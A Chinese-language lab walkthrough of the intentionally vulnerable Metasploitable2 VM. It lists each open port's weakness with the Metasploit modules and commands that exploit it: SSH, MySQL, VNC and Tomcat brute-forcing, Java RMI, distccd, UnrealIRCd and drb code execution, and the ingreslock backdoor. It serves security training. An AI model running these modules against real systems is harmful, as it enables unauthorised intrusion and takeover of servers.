Metasploitable2靶机介绍:Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 。适用于学习网络安全新手学习。 Metasploitable2靶机下载:https://pan.baidu.com/s/1SE1xoRtXMsrj_34FJQXT2Q Metasploitable2靶机安装:下载好了把安装包解压 然后试用VMware即可。 Metasploitable2靶机漏洞详解:渗透机:kali IP :192.168.28.128 靶机IP :192.168.28.141 漏洞清单:21端口search vsftpd 22端口==直接暴力破解Search ssh_login 搜索模块 Use auxiliary/scanner/ssh/ssh_login 使用模块 Set RHOST 192.168.28.141 设置目标地址 Set USER_FILE XXX 设置用户字典路径 Set PASS_FILE XXX 设置字典密码路径 Set THREADS 100 设置线程是100 Run 23端口(telnet):search telnet_login 80端口拿到站点进行渗透老套路====信息搜集啥的 search php-cgi use 0 set rhost 192.168.28.141 run background====将shell后置后台 139端口,445端口这两个都是smb类型的,是共享服务,首选我们需要知道它的共享目录有哪些,枚举之后可看到一共发现有5个如下 search smb_eumn 在使用一个脚本:use auxiliary/admin/smb/samba_symlink_traversal 1099端口一个Java反序列化命令执行漏洞,可以看到已经getshell 原理:Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致 search java rmi 4 exploit/multi/misc/java_rmi_server use 4 set rhosts 192.168.28.141 run 1524端口ingreslock在少数服务器上存在一个古老的令人惊讶的“ingreslock”后门,监听1524端口。在过去的十年里,它经常被用于入侵一个暴露的服务器。它的利用是如此简单。 telnet 192.168.28.141 1524 3306数据库默认端口既然运行远程连接,直接爆破,账号root密码为空然后登入 使用模块:use auxiliary/scanner/mysql/mysql_login search mysql_login use 0 set username root 3632 distccd服务远程命令执行漏洞,直接exp 使用模块:use exploit/unix/misc/distcc_exec search distccd 后面几个利用教程就不详细展开了!!! 5432端口postgresq爆破 5900端口vnc服务vnc服务有两部分构成,一部分是服务,一个是客户端,我们进行爆破 使用模块爆破:use auxiliary/scanner/vnc/vnc_login 6667端口6697 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell 使用模块:use exploit/unix/irc/unreal_ircd_3281_backdoor 8180端口暴力破解账号密码:tomcat;tomcat 8787端口drb服务有个远程代码执行漏洞 使用模块:use exploit/linux/misc/drb_remote_codeexec |
|